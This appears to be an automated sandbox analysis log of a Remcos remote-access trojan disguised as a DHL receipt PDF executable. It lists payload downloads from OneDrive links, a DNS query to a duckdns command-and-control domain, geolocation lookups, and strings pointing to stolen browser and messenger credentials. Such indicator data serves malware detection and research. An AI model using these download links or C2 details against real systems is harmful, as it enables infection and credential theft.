              Source: global trafficHTTP traffic detected: GET /y4mwqLrk7RkQprlQVguzd88u3aa6lBoHekLBbEwen4SV_s0bZDyk4W2wHSklQ9o0cCCMUNAFWFXBJMd5EVMwo_6Fwd9E2VHHxYJdf6JUZ-XNUvMWe3LcrUXywANQk_fQBIHV4OAxI-dyvQC_XAAoGU5rhOshlVK_uuOzHfxjtkmujdvM7GtN2qEEWRWumZ9nPPxMahWmeQsnUX_PjspIY14YQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA66CB1 recv,0_2_2DA66CB1
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sxjVaZT4pY1q2eD0v-X1wiwRbDuGgZo1tPSkJQs1YlyPwcUOiphPP1CFv5fso0icEDo7UAOw11RMGNT3gKAlqFYfTYnpmUh-zszDDp01M-O6V1fxPW_BQeV--ErDLGsxS3W7ik99EAoJzOkWYmsVxFxg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtduMf3h_au6JknD7UX3Nl_MoVpKgD52R4PqoJUKWWdS4uSG73hTWQdvja7P44RRgZEYiLLcwYHjthc2obdA6bfKdGY5u4FdO7DnLs4oCuESa0XFsNGj4J9xIGakwI-vvnf8T5wmslL_zbb61Cor0vi4A/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4lwBmhbII6IBdf0o3fxZK7yXuPn1LU5GNfJiPoJA9A_3sVCDQ9m4bgvnVzMP5THmKtOGhfXkUIlvBLYfdv66aM2t5dQKJV9HM_tE2EpVyspDfMklEPIq63I71zYBRHlyxU6NlRs6xSUBmbwPAYp6Jhg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4SuVfoR9x-Iomuy2BGk4fUfgK1MMU5lLacLNp-_qwXhodYEIY-kbbcZJlxV0oGHQD1Ct2YWj0uKczDCYctblhO9FSOouYIL0JztXtWXSZy4aW13cnRilCw1aQM1FfakIYbRqJw9b266qfDhk_4fORrQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /y4mwqLrk7RkQprlQVguzd88u3aa6lBoHekLBbEwen4SV_s0bZDyk4W2wHSklQ9o0cCCMUNAFWFXBJMd5EVMwo_6Fwd9E2VHHxYJdf6JUZ-XNUvMWe3LcrUXywANQk_fQBIHV4OAxI-dyvQC_XAAoGU5rhOshlVK_uuOzHfxjtkmujdvM7GtN2qEEWRWumZ9nPPxMahWmeQsnUX_PjspIY14YQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ppeppa.db.files.1drv.com
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: //login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: //login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: remcos.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: bhvC179.tmp.20.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvC179.tmp.20.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
              Source: global trafficDNS traffic detected: DNS query: ppeppa.db.files.1drv.com
              Source: global trafficDNS traffic detected: DNS query: jantasagasa.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: DHL119040 receipt document,pdf.exe, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000068F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:R
              Source: remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpv
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: xkn.exe, 00000010.00000002.1804930904.00000151BD55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: bhvC179.tmp.20.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: remcos.exe, 00000016.00000003.1820018363.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000003.1820090279.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: bhvC179.tmp.20.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
              Source: remcos.exe, 00000014.00000002.1856718053.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: DHL119040 receipt document,pdf.exe, DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp, yfkwifxL.pif, yfkwifxL.pif, 00000001.00000001.1712591373.0000000000418000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000000.1711928775.0000000000416000.00000002.00000001.01000000.00000005.sdmp, yfkwifxL.pif, 00000001.00000001.1712591373.000000000044B000.00000040.00000001.00020000.00000000.sdmp, yfkwifxL.pif, 00000001.00000002.1876666457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, yfkwifxL.pif.0.drString found in binary or memory: http://www.pmail.com
              Source: bhvC179.tmp.20.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
              Source: bhvC179.tmp.20.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
              Source: bhvC179.tmp.20.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
              Source: bhvC179.tmp.20.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
              Source: bhvC179.tmp.20.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
              Source: bhvC179.tmp.20.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
              Source: bhvC179.tmp.20.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
              Source: bhvC179.tmp.20.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
              Source: bhvC179.tmp.20.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
              Source: bhvC179.tmp.20.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
              Source: bhvC179.tmp.20.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvC179.tmp.20.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: xkn.exe, 00000010.00000002.1804930904.00000151BD507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: xkn.exe, 00000010.00000002.1804930904.00000151BD529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: bhvC179.tmp.20.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvC179.tmp.20.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: bhvC179.tmp.20.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhvC179.tmp.20.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhvC179.tmp.20.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhvC179.tmp.20.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
